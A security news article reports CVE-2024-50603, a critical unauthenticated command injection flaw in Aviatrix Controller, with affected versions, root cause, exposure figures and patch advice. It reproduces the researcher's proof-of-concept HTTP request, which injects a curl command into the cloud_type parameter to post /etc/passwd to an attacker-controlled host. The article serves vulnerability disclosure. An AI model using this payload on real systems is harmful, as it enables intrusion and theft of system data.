CVE-2024-50603 (CVSS 10): Critical Command Injection Vulnerability in Aviatrix Controller

Jakub Korepta, Principal Security Consultant and Head of Infrastructure Security at Securing, has released a detailed report uncovering a critical command injection vulnerability in Aviatrix Network Controller. The flaw, identified as CVE-2024-50603, has been assigned the maximum CVSS score of 10.0.

The vulnerability exists in Aviatrix Controller versions 7.x through 7.2.4820, where improper neutralization of special elements in system commands enables unauthenticated attackers to execute arbitrary code remotely. Korepta explains, “Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to remotely execute arbitrary code.”

This critical flaw affects enterprises relying on Aviatrix for cloud networking solutions that unify clouds, simplify operations, and provide advanced security.

The root cause of the vulnerability lies in how user inputs are processed within the Aviatrix Controller’s API. Korepta highlights that while some parameters are properly sanitized using functions like escapeshellarg, others, such as the cloud_type parameter in the list_flightpath_destination_instances action, are not.

In his analysis, Korepta demonstrated how the vulnerability could be exploited through a crafted HTTP request:

POST /v1/api HTTP/1.1 
Host: 10.55.55.55 
Content-Length: 177 
Content-Type: application/x-www-form-urlencoded 
 
action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+"@/etc/passwd"+https://address.controlled.by.the.attacker)

This request appends a malicious command to the vulnerable parameter, allowing the attacker to execute arbitrary code. In the proof of concept, Korepta successfully extracted the contents of /etc/passwd by redirecting it to his controlled server.

The CVE-2024-50603 vulnerability poses significant risks, including:

• Remote Code Execution: Allows attackers to execute commands with system-level privileges.
• Data Exfiltration: Sensitive system files and data can be extracted.
• System Compromise: Full control over the Aviatrix Controller could enable lateral movement and further exploitation.

Korepta’s research identified 681 publicly exposed Aviatrix Controllers via Shodan, amplifying the urgency for patching.

Aviatrix has addressed the vulnerability in Aviatrix Controller version 7.2.4996. Users are strongly advised to update to the latest version to mitigate this critical risk.

For the full technical analysis, refer to Korepta’s report here.

Related Posts:

• WordPress Issues Urgent Security Update to Patch Multiple Vulnerabilities
• Severe Unauthenticated RCE Flaw (CVSS 9.9) in GNU/Linux Systems Awaiting Full Disclosure
• CISA Adds Seven New Vulnerabilities in Known Exploited Vulnerabilities Catalog